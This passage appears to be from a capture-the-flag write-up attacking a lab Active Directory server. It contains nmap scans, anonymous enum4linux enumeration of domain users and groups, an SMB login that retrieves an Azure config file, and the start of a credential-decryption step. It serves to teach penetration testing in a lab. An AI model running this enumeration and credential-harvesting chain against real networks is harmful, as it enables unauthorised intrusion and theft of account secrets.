```
$ sudo nmap -p- 10.10.10.172 -oA nmap_ports
[sudo] password for noraj:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 21:49 CET
Nmap scan report for 10.10.10.172
Host is up (0.031s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49703/tcp open  unknown
49775/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 123.83 seconds
```
Then I ran nmap again against the open ports only, this time with version detection and the default NSE scripts.
```
$ sudo nmap -sSVC -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49703,49775 10.10.10.172 -oA nmap_services
[sudo] password for noraj:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 22:08 CET
Stats: 0:04:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.34% done; ETC: 22:12 (0:00:01 remaining)
Nmap scan report for 10.10.10.172
Host is up (0.031s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-25 20:20:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/25%Time=5E7BC858%P=x86_64-unknown-linux-gnu%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 275.27 seconds
```
Let's see what we can find over SMB with CrackMapExec, enum4linux and impacket's GetNPUsers.py. The enum4linux output is reproduced below: the DC accepts a null session and, although share listing, srvinfo and RID cycling are denied, it still hands out the domain SID and the complete domain group memberships to an anonymous caller.
```
 ============================================ 
|    Nbtstat Information for 10.10.10.172    |
 ============================================ 
Looking up status of 10.10.10.172
No reply from 10.10.10.172

 ===================================== 
|    Session Check on 10.10.10.172    |
 ===================================== 
[+] Server 10.10.10.172 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.172    |
 =========================================== 
Unable to initialize messaging context
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.172    |
 ====================================== 
[+] Got OS info for 10.10.10.172 from smbclient: 
[+] Got OS info for 10.10.10.172 from srvinfo:
Unable to initialize messaging context
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ========================================= 
|    Share Enumeration on 10.10.10.172    |
 ========================================= 
Unable to initialize messaging context
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.172

 ==================================================== 
|    Password Policy Information for 10.10.10.172    |
 ==================================================== 
[E] Unexpected error from polenum:

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs

[+] Getting domain group memberships:
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary

 ======================================================================= 
|    Users on 10.10.10.172 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================= 
|    Getting printer info for 10.10.10.172    |
 ============================================= 
Unable to initialize messaging context
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
```
Let's see whether there are any valuable files in the users$ share.
```
$ smbclient '\\10.10.10.172\users$' -U 'SABatchJobs'
Unable to initialize messaging context
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> recuse on
recuse: command not found
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \mhope\azure.xml of size 1212 as azure.xml (4,8 KiloBytes/sec) (average 4,8 KiloBytes/sec)
```
```
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
```